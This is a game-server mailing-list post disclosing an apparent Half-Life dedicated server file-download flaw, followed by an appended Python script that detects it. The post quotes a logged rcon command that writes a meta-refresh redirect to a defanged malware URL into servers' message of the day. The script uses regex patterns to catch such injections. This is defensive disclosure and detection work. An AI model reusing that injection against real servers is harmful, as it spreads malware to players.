There is an exploit in the q3 engine named "q3dirtrav", which allows players to
download any of the server's files, including the server configuration
(server.cfg). Today I found evidence of the possible existence of the same
exploit in HLDS.

As a company we host hundreds of servers. We received many reports from our
customers about a strange HTTP refresh meta tag in the motd.txt of their
servers, which leads to "http *//free -leaks *com/cstrike*exe". The problem has
affected several different servers, unrelated to each other, with very
different RCON passwords (but most were very strong).

Here's what I have found in the logfiles:

Rcon from 178.123.103.201:15518:rcon 1399145428 XXXXXXXXXXXXXXXXXXX motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=http *//free -leaks *com/cstrike*exe">

This "cstrike.exe" contains some kind of a virus. (Note: I've replaced the dots
with asterisks and spaces.)

As you can see, the attacker knew the RCON password of each server. Then I
found a "server.CFG.ztmp" file in the cstrike directory of each server that was
attacked. For me that means the attacker was able to download server.cfg
exactly the same way as maps, models or sounds.
_______________________________________________
To unsubscribe, edit your list preferences, or view the list archives, please
visit:
https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux
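A detection check for the rcon log pattern quoted in the post, added here as an example and not part of the original message: it parses `Rcon from IP:port:rcon <challenge> <password> <command>` lines, redacts the password before anything is reported, and flags `motd_write` payloads that carry HTML/meta-refresh markup, URLs or executable names. The sample log lines, addresses and URL below are constructed placeholders.

```python
import re

# Constructed sample HLDS log lines; the second mirrors the shape of the
# line quoted in the post (addresses, password and URL are placeholders).
SAMPLE_LOG = """\
L 05/03/2014 - 21:10:28: Rcon from 203.0.113.10:27015:rcon 1399145411 XXXXXXXX status
L 05/03/2014 - 21:10:28: Rcon from 203.0.113.10:27015:rcon 1399145428 XXXXXXXX motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=http://example.invalid/cstrike.exe">
L 05/03/2014 - 21:11:02: Rcon from 203.0.113.10:27015:rcon 1399145499 XXXXXXXX changelevel de_dust2
L 05/03/2014 - 21:12:40: Rcon from 198.51.100.7:15518:rcon 1399145600 XXXXXXXX motd_write Welcome to our server!
"""

# "Rcon from <ip>:<port>:rcon <challenge> <password> <command...>"
RCON_RE = re.compile(
    r'Rcon from (?P<ip>[\d.]+):(?P<port>\d+):rcon '
    r'(?P<challenge>\d+) (?P<password>\S+) (?P<cmd>.*)$'
)
# Markup or download-style content has no business in a plain-text motd.
SUSPICIOUS_MOTD = re.compile(r'<\s*meta|http-equiv|https?://|\.exe\b', re.IGNORECASE)


def parse_rcon(line):
    """Return the fields of an rcon log line, or None if it is not one."""
    m = RCON_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['password'] = '<redacted>'  # never copy the rcon password into alerts
    return rec


def find_motd_injections(log_text):
    """Return (source_ip, command) for every suspicious motd_write command."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_rcon(line)
        if rec is None:
            continue
        parts = rec['cmd'].split(None, 1)
        if not parts or parts[0].lower() != 'motd_write':
            continue
        if SUSPICIOUS_MOTD.search(rec['cmd']):
            hits.append((rec['ip'], rec['cmd']))
    return hits


if __name__ == '__main__':
    for ip, cmd in find_motd_injections(SAMPLE_LOG):
        print(f'suspicious motd_write from {ip}: {cmd}')
```

Running it against a server's real log (e.g. `find_motd_injections(open(path).read())`) lists every source address that pushed markup into the motd, which is also the list of servers whose rcon password must be treated as compromised.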